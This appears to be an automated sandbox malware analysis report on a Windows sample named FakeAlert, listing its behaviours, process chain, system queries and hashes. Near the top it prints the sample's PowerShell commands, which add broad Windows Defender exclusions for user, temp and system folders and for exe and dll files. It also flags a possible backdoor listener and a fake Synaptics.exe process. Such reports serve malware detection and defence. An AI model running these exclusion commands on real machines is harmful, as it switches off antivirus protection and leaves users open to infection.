Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.FakeAlert.2.24488.exe

Code function: 0_2_004014A5 EntryPoint,memset,SetUnhandledExceptionFilter,__set_app_type,_controlfp,__argc,__argv,_environ,_environ,__argv,__getmainargs,__argc,__argv,_environ,__argc,__argc,exit,

0_2_004014A5

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.FakeAlert.2.24488.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c powershell -Command "Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.FakeAlert.2.24488.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c powershell -Command "Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"	Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\uniformerede.exe "C:\Users\user\AppData\Local\Temp\uniformerede.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	Process created: C:\Users\user\Desktop\._cache_uniformerede.exe "C:\Users\user\Desktop\._cache_uniformerede.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	Process created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate	Jump to behavior

Contains functionality to launch a program with higher privileges

Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe

Code function: 6_2_00473490 ShellExecuteEx,Sleep,WaitForSingleObject,

6_2_00473490

Contains functionality to query locales information (e.g. system language)

Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,	6_2_004061D0
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	Code function: GetLocaleInfoA,GetACP,	6_2_0040E088
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	Code function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,	6_2_004062DC
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	Code function: GetLocaleInfoA,	6_2_0040C964
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	Code function: GetLocaleInfoA,	6_2_0040C9B0
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	Code function: GetLocaleInfoA,	6_2_00406AC6
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	Code function: GetLocaleInfoA,	6_2_00406AC8
Source: C:\ProgramData\Synaptics\Synaptics.exe	Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,	9_2_004061D0
Source: C:\ProgramData\Synaptics\Synaptics.exe	Code function: GetLocaleInfoA,GetACP,	9_2_0040E088
Source: C:\ProgramData\Synaptics\Synaptics.exe	Code function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,	9_2_004062DC
Source: C:\ProgramData\Synaptics\Synaptics.exe	Code function: GetLocaleInfoA,	9_2_0040C964
Source: C:\ProgramData\Synaptics\Synaptics.exe	Code function: GetLocaleInfoA,	9_2_0040C9B0
Source: C:\ProgramData\Synaptics\Synaptics.exe	Code function: GetLocaleInfoA,	9_2_00406AC6
Source: C:\ProgramData\Synaptics\Synaptics.exe	Code function: GetLocaleInfoA,	9_2_00406AC8
Source: C:\ProgramData\Synaptics\Synaptics.exe	Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,	12_2_004061D0
Source: C:\ProgramData\Synaptics\Synaptics.exe	Code function: GetLocaleInfoA,GetACP,	12_2_0040E088
Source: C:\ProgramData\Synaptics\Synaptics.exe	Code function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,	12_2_004062DC
Source: C:\ProgramData\Synaptics\Synaptics.exe	Code function: GetLocaleInfoA,	12_2_0040C964
Source: C:\ProgramData\Synaptics\Synaptics.exe	Code function: GetLocaleInfoA,	12_2_0040C9B0
Source: C:\ProgramData\Synaptics\Synaptics.exe	Code function: GetLocaleInfoA,	12_2_00406AC6
Source: C:\ProgramData\Synaptics\Synaptics.exe	Code function: GetLocaleInfoA,	12_2_00406AC8

Queries the installation date of Windows

Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion InstallDate

Jump to behavior

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe

Code function: 6_2_0040B2D4 GetLocalTime,

6_2_0040B2D4

Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe

Code function: 6_2_0047E020 GetTimeZoneInformation,

6_2_0047E020

Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe

Code function: 6_2_00472E58 GetUserNameA,

6_2_00472E58

Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe

Code function: 6_2_00446564 GetVersion,

6_2_00446564

Contains functionality to launch a control a shell (cmd.exe)

Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	Code function: cmd.exe /C	6_2_00475384
Source: C:\ProgramData\Synaptics\Synaptics.exe	Code function: cmd.exe /C	9_2_00475384
Source: C:\ProgramData\Synaptics\Synaptics.exe	Code function: cmd.exe /C	12_2_00475384

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Source: C:\ProgramData\Synaptics\Synaptics.exe

Code function: 9_2_0047C7BC bind,

9_2_0047C7BC

Windows Analysis Report
SecuriteInfo.com.Variant.FakeAlert.2.24488.8627

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

ID:	634939
Product:	CloudBasic
Start time:	04:36:30
Start date:	27.05.2022
Sample:	SecuriteInfo.com.Variant.FakeAlert.2.24488.8627
Cookbook:	default.jbs
System description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Architecture:	WINDOWS
MD5:	c5bf732066ab84d1abba5b27638a5191
SHA1:	07b3b8a0e9008e459bd7ba727dd8380320dbc5ad
SHA256:	a4bdfb7869d435589479e095b8d0c9c2b8f987bd3a8c961424376f18c31c650f
Filetype:	Win32 Executable (generic) a (10002005/4) 99.94%

Name	Type	MD5	SHA1	SHA256
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Synaptics.exe_a5c396d0e6d651f539cd1b6dccb863d9c272052_455b7b6e_18c9b0c2\Report.wer	Little-endian UTF-16 Unicode text, with CRLF line terminators	003F3B5C61F927CD9B787EFC85CFD128	AFACE7575FBA9BE51D3A0EF7798E5E0CEAC71ADF	CA2610FD60A185204D451E31D3A08CDC179FF690028244A0AB351012A3A8F2A6
